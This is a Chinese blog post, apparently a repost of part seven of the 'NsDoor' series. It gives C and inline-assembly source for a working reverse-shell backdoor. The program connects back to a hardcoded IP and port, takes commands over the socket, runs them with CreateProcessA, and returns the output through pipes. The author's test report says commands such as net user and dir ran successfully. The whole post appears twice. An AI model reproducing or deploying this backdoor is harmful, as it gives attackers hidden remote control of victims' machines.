循环渐进NsDoor(七)
本來這個和上一篇就是連著的,但是上一篇也太長了點 所以在這再開始 //#include<iostream>?
#include<winsock2.h>?
#pragma?comment(lib,"Ws2_32")?
//using?namespace?std;?
-
//#define?PORT?1517?
//#define?IP?"192.168.6.20"?
-
int?main()?
{?
????//WSADATA?ws;?
????//WSAStartup(MAKEWORD(2,2),&ws);?
????_asm?
????{?
?????????
????????mov?eax,0x71A26A55?
????????mov?[ebp+4],eax;??????????WSAStartup?
????????mov?eax,0x71A24211?
????????mov?[ebp+8],eax;??????????socket?
????????mov?eax,0x7C81D827?
????????mov?[ebp+12],eax;??????????CreatePipe?
????????mov?eax,0x71A2676F?
????????mov?[ebp+16],eax;?????????recv?
????????mov?eax,0x7C802446?
????????mov?[ebp+20],eax;????????Sleep?
????????mov?eax,0x7C922435?
????????mov?[ebp+24],eax;?????????memset?
????????mov?eax,0x7C80236B?
????????mov?[ebp+28],eax;????????CreateProcessA?
????????mov?eax,0x71A24A07?
????????mov?[ebp+32],eax;?????????connect?
????????mov?eax,0x71A24C27?
????????mov?[ebp+36],eax?;??????send?
????????mov?eax,0x7C801812?
????????mov?[ebp+40],eax?;????????ReadFile?
-
-
????????mov?[ebp+56],0?
????????mov?[ebp+60],0?
????????mov?[ebp+80],0?
????}?
????_asm?
????{?
-
????????sub?esp,400?
????????push?esp?
????????push?0x202?
????????call?[ebp+4]?
????}?
-
-
???//SOCKET?sockfd;?
????//sockfd?=?socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);?
????_asm?
????{?
????????push?6?
????????push?1?
????????push?2?
????????call?[ebp+8]?
????????//mov?sockfd,eax?
????????mov?ebx,eax?
????}?
-
????//struct?sockaddr_in?server;?
????//server.sin_family?=?AF_INET;?
????//server.sin_port?=?htons(PORT);?
????//server.sin_addr.S_un.S_addr?=?inet_addr(IP);?
-
????//while(connect(sockfd,(struct?sockaddr*)&server,sizeof?server)?==?-1);?
????_asm?
????{?
conn:?
????????push?0x1406A8C0?
????????mov?eax,0xED050002?
????????push?eax?
????????mov?esi,esp?
-
????????push?0x10?
????????push?esi?
????????push?ebx?
????????call?[ebp+32]?
????????cmp?eax,-1?
????????je?conn?
????}?
????//SECURITY_ATTRIBUTES?pipeattr;?
????//HANDLE?hReadPipe,hWritePipe;?
????//pipeattr.nLength?=?12;?
????//pipeattr.bInheritHandle?=?true;?
????//pipeattr.lpSecurityDescriptor?=?0;?
????//SECURITY_ATTRIBUTES*?ppi?=?&pipeattr;?
????//int?size?=?sizeof?pipeattr;?
????//cout<<&pipeattr<<endl<<size<<endl;?
????//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);?
????//HANDLE*?pr,pw;?
????//pr?=?&hReadPipe;?
????//pw?=?&hWritePipe;?
????_asm?
????{?
????????push?0x00000001?
????????push?0x00000000?
????????push?0x0000000c?
????????mov?eax,esp?
????????push?0?
????????push?eax?
??????lea?eax,?[ebp+60]??;&hWritePipe1?
??????push?eax?
???????lea?eax,?[ebp+56]??;&hReadPipe1?
???????push?eax?
???????call?[ebp+12]?
????}?
-
????//STARTUPINFOA?si;?
????//cout<<&si<<endl<<sizeof?si<<endl;?
????//ZeroMemory(&si,sizeof?si);?
?????
-
????//si.dwFlags?=?STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;?
????//si.wShowWindow?=?SW_HIDE;?
????//si.hStdOutput?=?si.hStdError?=?hWritePipe;//木輸入管道?
-
????//cout<<&si<<endl<<sizeof?si<<endl;?
????_asm?
????{?
????????push?0x00000F8C?
????????push?0x00000F8C?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000101?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????mov?edi,esp?
????}?
?????
????//unsigned?long?lBytesRead?=?0;?
-
????//PROCESS_INFORMATION?ProcessInformation;?
-
-
-
????//char?Buf[1024]?=?{0};?
????//char?RecvBuf[200]?=?{0};?
?????while(true)?
?????{?
?????????//recv(sockfd,RecvBuf,200,0);?
?????????_asm?
?????????{?
?????????????push?0?
?????????????push?200?
?????????????lea?eax,[ebp-4cch]?
?????????????push?eax?
?????????????push?ebx?
?????????????call?[ebp+16]?
?????????}?
?????????//cout<<RecvBuf<<endl;?
?????????//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);?
?????????//STARTUPINFOA*?psi?=?&si;?
?????????//PROCESS_INFORMATION*?proc?=?&ProcessInformation;?
?????????//cout<<proc<<endl<<sizeof?ProcessInformation<<endl;?
-
-
?????????_asm?
?????????{?
conn2:?
?????????????push?0x7c969564?
?????????????push?0x7c98d144?
?????????????push?0xffffffff?
?????????????push?0x7c98d168?
?????????????mov?eax,esp?
?????????????push?eax?
?????????????push?edi?
?????????????push?0?
?????????????push?0?
?????????????push?0?
?????????????push?1?
?????????????push?0?
?????????????push?0?
?????????????lea?eax,[ebp-4cch]?
?????????????push?eax?
?????????????push?0?
?????????????call?[ebp+28]?
?????????????cmp?eax,0?
?????????????je?conn2?
?????????}?
-
-
-
?????????????//Sleep(1000);?
?????????_asm?
?????????{?
?????????????push?300?
?????????????call?[ebp+20]?
?????????}?
?????????//cout<<RecvBuf<<endl;?
-
????????????//?ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);?
?????????????//LPDWORD?plbr?=?&lBytesRead;?
?????????????_asm?
?????????????{?
?????????????????push?0?
?????????????????push?edi?
?????????????????push?1024?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????push?[ebp+56]?
?????????????????call?[ebp+40]?
?????????????}?
????????????//?cout<<Buf<<endl;?
?????????????//cout<<"flag"<<endl;?
-
????????????//send(sockfd,Buf,1024,0);?
????????????_asm?
?????????????{?
?????????????????push?0?
?????????????????push?[edi]?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????push?ebx?
?????????????????call?esi?
?????????????}?
????????????//cout<<Buf<<endl;?
?????????????//memset(Buf,0,1024);?
?????????????_asm?
?????????????{?
?????????????????push?1024?
?????????????????push?0?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????call?[ebp+24]?
?????????????}?
?????????????//Sleep(100);?
?????????????_asm?
?????????????{?
?????????????????push?100?
?????????????????call?[ebp+20]?
?????????????}?
-
-
?????????//memset(RecvBuf,0,200);?
?????????????_asm?
?????????????{?
?????????????????push?200?
?????????????????push?0?
?????????????????lea?eax,[ebp-4cch]?
?????????????????push?eax?
?????????????????call?[ebp+24]?
?????????????}?
-
?????}?
-
?????return?0;?
}?
-
-
-
- 前面已經分析了很多函數,我下面就不仔細分析了,把我分析好的代碼貼出來show下,呵呵: 呵呵,很強大吧 看著輕松,我花了三天才搞定所有,里面的意外太多了,內存一個字節一個字節的摳數據,地址跳轉不對,返回值被刷掉,意外太多了…. 累死我了 - - - 測試報告: - 目前這個代碼基本能使用,偶爾出現死在ReadFile處的事情,這個很早以前就遇到過,還有時候會遇到Send函數的地址訪問沖突, 但是debug的時候都很正常,反彈后門完全可以使用,不是debug時,偶爾會出現客戶端和服務端互相等待的事情…. 服務端 - - 客戶端 - - 呵呵,訪問成功啦 - - 執行net user和time的情形 - - - Dir的結果 - Dir&time的結果 - 輸入錯誤的結果 - - Ping的結果,照樣出現延遲,不過一點也不影響結果,呵呵 - - 哈哈,到這里NsDoor的前期版本,或者說服務端優化基本快完了,技術性的工作已經沒了,期待 shellcode吧 - - - ---------------by NewSketcher Time: 080822 21:20
#include<winsock2.h>?
#pragma?comment(lib,"Ws2_32")?
//using?namespace?std;?
-
//#define?PORT?1517?
//#define?IP?"192.168.6.20"?
-
int?main()?
{?
????//WSADATA?ws;?
????//WSAStartup(MAKEWORD(2,2),&ws);?
????_asm?
????{?
?????????
????????mov?eax,0x71A26A55?
????????mov?[ebp+4],eax;??????????WSAStartup?
????????mov?eax,0x71A24211?
????????mov?[ebp+8],eax;??????????socket?
????????mov?eax,0x7C81D827?
????????mov?[ebp+12],eax;??????????CreatePipe?
????????mov?eax,0x71A2676F?
????????mov?[ebp+16],eax;?????????recv?
????????mov?eax,0x7C802446?
????????mov?[ebp+20],eax;????????Sleep?
????????mov?eax,0x7C922435?
????????mov?[ebp+24],eax;?????????memset?
????????mov?eax,0x7C80236B?
????????mov?[ebp+28],eax;????????CreateProcessA?
????????mov?eax,0x71A24A07?
????????mov?[ebp+32],eax;?????????connect?
????????mov?eax,0x71A24C27?
????????mov?[ebp+36],eax?;??????send?
????????mov?eax,0x7C801812?
????????mov?[ebp+40],eax?;????????ReadFile?
-
-
????????mov?[ebp+56],0?
????????mov?[ebp+60],0?
????????mov?[ebp+80],0?
????}?
????_asm?
????{?
-
????????sub?esp,400?
????????push?esp?
????????push?0x202?
????????call?[ebp+4]?
????}?
-
-
???//SOCKET?sockfd;?
????//sockfd?=?socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);?
????_asm?
????{?
????????push?6?
????????push?1?
????????push?2?
????????call?[ebp+8]?
????????//mov?sockfd,eax?
????????mov?ebx,eax?
????}?
-
????//struct?sockaddr_in?server;?
????//server.sin_family?=?AF_INET;?
????//server.sin_port?=?htons(PORT);?
????//server.sin_addr.S_un.S_addr?=?inet_addr(IP);?
-
????//while(connect(sockfd,(struct?sockaddr*)&server,sizeof?server)?==?-1);?
????_asm?
????{?
conn:?
????????push?0x1406A8C0?
????????mov?eax,0xED050002?
????????push?eax?
????????mov?esi,esp?
-
????????push?0x10?
????????push?esi?
????????push?ebx?
????????call?[ebp+32]?
????????cmp?eax,-1?
????????je?conn?
????}?
????//SECURITY_ATTRIBUTES?pipeattr;?
????//HANDLE?hReadPipe,hWritePipe;?
????//pipeattr.nLength?=?12;?
????//pipeattr.bInheritHandle?=?true;?
????//pipeattr.lpSecurityDescriptor?=?0;?
????//SECURITY_ATTRIBUTES*?ppi?=?&pipeattr;?
????//int?size?=?sizeof?pipeattr;?
????//cout<<&pipeattr<<endl<<size<<endl;?
????//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);?
????//HANDLE*?pr,pw;?
????//pr?=?&hReadPipe;?
????//pw?=?&hWritePipe;?
????_asm?
????{?
????????push?0x00000001?
????????push?0x00000000?
????????push?0x0000000c?
????????mov?eax,esp?
????????push?0?
????????push?eax?
??????lea?eax,?[ebp+60]??;&hWritePipe1?
??????push?eax?
???????lea?eax,?[ebp+56]??;&hReadPipe1?
???????push?eax?
???????call?[ebp+12]?
????}?
-
????//STARTUPINFOA?si;?
????//cout<<&si<<endl<<sizeof?si<<endl;?
????//ZeroMemory(&si,sizeof?si);?
?????
-
????//si.dwFlags?=?STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;?
????//si.wShowWindow?=?SW_HIDE;?
????//si.hStdOutput?=?si.hStdError?=?hWritePipe;//木輸入管道?
-
????//cout<<&si<<endl<<sizeof?si<<endl;?
????_asm?
????{?
????????push?0x00000F8C?
????????push?0x00000F8C?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000101?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????mov?edi,esp?
????}?
?????
????//unsigned?long?lBytesRead?=?0;?
-
????//PROCESS_INFORMATION?ProcessInformation;?
-
-
-
????//char?Buf[1024]?=?{0};?
????//char?RecvBuf[200]?=?{0};?
?????while(true)?
?????{?
?????????//recv(sockfd,RecvBuf,200,0);?
?????????_asm?
?????????{?
?????????????push?0?
?????????????push?200?
?????????????lea?eax,[ebp-4cch]?
?????????????push?eax?
?????????????push?ebx?
?????????????call?[ebp+16]?
?????????}?
?????????//cout<<RecvBuf<<endl;?
?????????//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);?
?????????//STARTUPINFOA*?psi?=?&si;?
?????????//PROCESS_INFORMATION*?proc?=?&ProcessInformation;?
?????????//cout<<proc<<endl<<sizeof?ProcessInformation<<endl;?
-
-
?????????_asm?
?????????{?
conn2:?
?????????????push?0x7c969564?
?????????????push?0x7c98d144?
?????????????push?0xffffffff?
?????????????push?0x7c98d168?
?????????????mov?eax,esp?
?????????????push?eax?
?????????????push?edi?
?????????????push?0?
?????????????push?0?
?????????????push?0?
?????????????push?1?
?????????????push?0?
?????????????push?0?
?????????????lea?eax,[ebp-4cch]?
?????????????push?eax?
?????????????push?0?
?????????????call?[ebp+28]?
?????????????cmp?eax,0?
?????????????je?conn2?
?????????}?
-
-
-
?????????????//Sleep(1000);?
?????????_asm?
?????????{?
?????????????push?300?
?????????????call?[ebp+20]?
?????????}?
?????????//cout<<RecvBuf<<endl;?
-
????????????//?ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);?
?????????????//LPDWORD?plbr?=?&lBytesRead;?
?????????????_asm?
?????????????{?
?????????????????push?0?
?????????????????push?edi?
?????????????????push?1024?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????push?[ebp+56]?
?????????????????call?[ebp+40]?
?????????????}?
????????????//?cout<<Buf<<endl;?
?????????????//cout<<"flag"<<endl;?
-
????????????//send(sockfd,Buf,1024,0);?
????????????_asm?
?????????????{?
?????????????????push?0?
?????????????????push?[edi]?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????push?ebx?
?????????????????call?esi?
?????????????}?
????????????//cout<<Buf<<endl;?
?????????????//memset(Buf,0,1024);?
?????????????_asm?
?????????????{?
?????????????????push?1024?
?????????????????push?0?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????call?[ebp+24]?
?????????????}?
?????????????//Sleep(100);?
?????????????_asm?
?????????????{?
?????????????????push?100?
?????????????????call?[ebp+20]?
?????????????}?
-
-
?????????//memset(RecvBuf,0,200);?
?????????????_asm?
?????????????{?
?????????????????push?200?
?????????????????push?0?
?????????????????lea?eax,[ebp-4cch]?
?????????????????push?eax?
?????????????????call?[ebp+24]?
?????????????}?
-
?????}?
-
?????return?0;?
}?
-
-
-
- 前面已經分析了很多函數,我下面就不仔細分析了,把我分析好的代碼貼出來show下,呵呵: 呵呵,很強大吧 看著輕松,我花了三天才搞定所有,里面的意外太多了,內存一個字節一個字節的摳數據,地址跳轉不對,返回值被刷掉,意外太多了…. 累死我了 - - - 測試報告: - 目前這個代碼基本能使用,偶爾出現死在ReadFile處的事情,這個很早以前就遇到過,還有時候會遇到Send函數的地址訪問沖突, 但是debug的時候都很正常,反彈后門完全可以使用,不是debug時,偶爾會出現客戶端和服務端互相等待的事情…. 服務端 - - 客戶端 - - 呵呵,訪問成功啦 - - 執行net user和time的情形 - - - Dir的結果 - Dir&time的結果 - 輸入錯誤的結果 - - Ping的結果,照樣出現延遲,不過一點也不影響結果,呵呵 - - 哈哈,到這里NsDoor的前期版本,或者說服務端優化基本快完了,技術性的工作已經沒了,期待 shellcode吧 - - - ---------------by NewSketcher Time: 080822 21:20
轉載于:https://www.cnblogs.com/ns517/archive/2008/10/04/1303756.html